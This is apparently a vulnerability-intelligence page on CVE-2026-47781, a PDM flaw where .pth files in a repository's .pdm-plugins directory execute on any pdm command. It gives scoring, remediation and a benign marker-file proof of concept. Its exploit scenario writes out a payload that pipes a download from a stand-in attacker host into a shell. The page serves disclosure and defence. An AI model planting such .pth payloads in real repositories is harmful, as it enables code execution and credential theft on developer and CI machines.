Which versions of PDM are affected by CVE-2026-47781?

PDM (Python Development Master) versions 2.26.9 and earlier contain a local code execution vulnerability where publicly available exploit code exists.. A patch is available.

Is there a public PoC exploit available for CVE-2026-47781?

Yes, a public proof-of-concept exploit is available for CVE-2026-47781. Prioritise patching immediately. EPSS: 0.0%.

How to fix or mitigate CVE-2026-47781?

Within 24 hours: Inventory all systems running PDM and identify versions currently in use across development teams. Within 7 days: Issue security advisory to development teams, mandate immediate review of PDM usage in non-company-controlled repositories, and implement policy restricting PDM execution to trusted repository directories. Within 30 days: Upgrade PDM to the latest available version and deploy automated repository validation controls, including mandatory code review of .pdm-plugins files and isolation of third-party repository access.

PDM CVE-2026-47781

HIGH

Code Injection (CWE-94)

2026-06-11 https://github.com/pdm-project/pdm

GHSA-qq6c-99pv-prvf

Python Privilege Escalation Code Injection RCE

Severity by source

vuln.today AI

7.8 HIGH

Local attack vector via repository contents, low complexity (one-line .pth), no attacker privileges needed, but victim must run pdm in the malicious checkout (UI:R); full CIA impact as invoking user.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Estimated by vuln.today — no official severity rating has been published for this CVE yet.

Lifecycle Timeline

Source Code Evidence Fetched

Jun 11, 2026 - 13:50 vuln.today

Analysis Generated

Jun 11, 2026 - 13:50 vuln.today

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

46 pypi packages depend on pdm (40 direct, 7 indirect)

Ecosystem-wide dependent count for version 2.27.0.

DescriptionCVE.org

Summary

PDM automatically loads project-local plugin paths from .pdm-plugins during Core initialization. Because this path is added via site.addsitedir(), attacker-controlled .pth files inside the project plugin directory are processed and can execute Python code before normal CLI handling begins.

This allows arbitrary code execution with the privileges of the user running pdm from an untrusted repository checkout.

Affected Behavior

Trigger does not require pdm install --plugins
A low-impact command such as pdm --version is sufficient
Impact is strongest in CI, privileged shells, and automation contexts

Affected Code

src/pdm/core.py:74-82
src/pdm/core.py:310-333
src/pdm/core.py:335-352

Technical Details

Core.__init__() calls load_plugins() before ordinary command execution. load_plugins() calls _add_project_plugins_library(), which derives the project-local .pdm-plugins library path and adds it through site.addsitedir().

On CPython, site.addsitedir() processes .pth files found in the added directory. .pth lines beginning with import are executed immediately. This creates a trust-boundary break: project-controlled files execute before the user explicitly opts into plugin installation or plugin loading.

Impact

Arbitrary code execution as the invoking user
Potential credential theft, persistence, or workspace tampering
Potential privilege escalation when pdm is run via sudo, root-owned CI jobs, or privileged service accounts

Reproduction

PoC:

bash

# Replace this with a Python interpreter that can run `python -m pdm`.
PDM_PY=/path/to/python-with-pdm
tmpdir=$(mktemp -d)

cat > "$tmpdir/pyproject.toml" <<'EOF'
[project]
name = "plugin-autoload-demo"
version = "0.0.1"
EOF

purelib=$(TMPDIR_ROOT="$tmpdir/.pdm-plugins" "$PDM_PY" - <<'PY'
import os
import sys
import sysconfig

base = os.environ["TMPDIR_ROOT"]
scheme_names = sysconfig.get_scheme_names()
if (sys.platform == "darwin" and "osx_framework_library" in scheme_names) or sys.platform == "linux":
    scheme = "posix_prefix"
elif sys.version_info < (3, 10):
    scheme = "nt" if os.name == "nt" else "posix_prefix"
else:
    scheme = sysconfig.get_default_scheme()
replace_vars = {"base": base, "platbase": base}
print(sysconfig.get_path("purelib", scheme, replace_vars))
PY
)

mkdir -p "$purelib"
marker="$tmpdir/plugin-autoload-marker.txt"
printf '%s\n' "import pathlib; pathlib.Path(r'$marker').write_text('project plugin autoload executed', encoding='utf-8')" > "$purelib/evil.pth"

(
  cd "$tmpdir" &&
  "$PDM_PY" -m pdm --version
)

cat "$marker"

Expected result:

A temporary project is created
An evil.pth file is placed under .pdm-plugins
Running pdm --version creates a marker file before CLI exit

Observed output from local validation:

text

PDM, version 2.26.9

--- marker ---
project plugin autoload executed

Severity

High

CVSS v4.0

Base score: 8.4 (High)
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rationale:

AV:L: exploitation occurs through local execution of pdm against attacker-controlled repository content
AC:L: no special bypass or race is required
AT:N: no external precondition beyond the vulnerable workflow is required
PR:N: the attacker does not need privileges on the victim host
UI:A: the victim must actively run a pdm command in the malicious checkout
VC:H/VI:H/VA:H: successful exploitation yields arbitrary code execution as the invoking user
SC:N/SI:N/SA:N: the score is kept to same-system impact only

Root Cause

Project-local plugin paths are implicitly trusted and loaded too early, and .pth processing is inherited from site.addsitedir().

Recommended Remediation

Do not auto-load project-local .pdm-plugins by default
Avoid site.addsitedir() for project-controlled plugin paths
If project plugins must be supported, require explicit opt-in such as --enable-project-plugins
Explicitly prevent .pth execution when loading project plugin paths

Disclosure Notes

This issue is a strong standalone CVE candidate because it yields direct code execution from repository-controlled files without requiring the victim to run a project script explicitly.

Articles & Coverage 1

News 6 New Python Vulnerabilities - 1 Critical, 5 High, 3 With POC Jun 12, 2026

AnalysisAI

Local arbitrary code execution in PDM (Python Development Master) versions <= 2.26.9 allows attacker-controlled repositories to execute Python code under the invoking user's privileges when any pdm command (even pdm --version) is run inside a malicious checkout. The root cause is implicit loading of project-local .pdm-plugins via site.addsitedir(), which processes .pth files containing executable import statements before CLI parsing. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Attacker publishes malicious repo with `.pdm-plugins/.../evil.pth`

Delivery

Victim clones repository in dev or CI

Exploit

Victim runs any `pdm` command (e.g. `pdm --version`)

Execution

`Core.__init__` calls `site.addsitedir('.pdm-plugins/...')`

Persist

CPython processes `.pth` and executes `import` payload

Impact

Arbitrary code runs as invoking user, enabling credential theft or persistence

Access

Attacker publishes malicious repo with `.pdm-plugins/.../evil.pth`

Delivery

Victim clones repository in dev or CI

Exploit

Victim runs any `pdm` command (e.g. `pdm --version`)

Execution

`Core.__init__` calls `site.addsitedir('.pdm-plugins/...')`

Persist

CPython processes `.pth` and executes `import` payload

Impact

Arbitrary code runs as invoking user, enabling credential theft or persistence

Vulnerability AssessmentAI

Exploitation	Exploitation requires (1) the victim to invoke any `pdm` subcommand - including read-only ones like `pdm --version` - with the current working directory inside an attacker-controlled repository checkout, (2) the repository to contain a `.pdm-plugins/` directory with a crafted `.pth` file located under the platform's purelib path (resolved via `sysconfig.get_path('purelib')`), and (3) PDM version <= 2.26.9 running on CPython, which implements the `.pth` auto-execution behavior in `site.addsitedir()`. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The vendor-assigned CVSS 4.0 score is 8.4 (High) with vector AV:L/AC:L/PR:N/UI:A and full VC/VI/VA:H, which accurately reflects local-but-trivial arbitrary code execution requiring only that the victim run any pdm command in a malicious checkout. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker publishes or contributes to a Git repository containing a `.pdm-plugins/<purelib>/evil.pth` file whose single line is `import os; os.system('curl attacker.tld/x \| sh')`. A developer clones the repo and runs any pdm command - even `pdm --version` - to check the project, at which point the `.pth` is processed by `site.addsitedir()` and the payload executes as the developer's user; in a CI runner using pdm, the same payload runs under the build account with access to repo secrets. …
Remediation	Vendor-released patch: PDM 2.27.0 - upgrade immediately via `pip install -U pdm` or your distribution's package manager; the release moves project plugin installations out of the in-tree `.pdm-plugins` directory into an isolated cache and ships a fixer to migrate existing plugin directories (https://github.com/pdm-project/pdm/releases/tag/2.27.0). … Detailed patch versions, workarounds, and compensating controls in full report.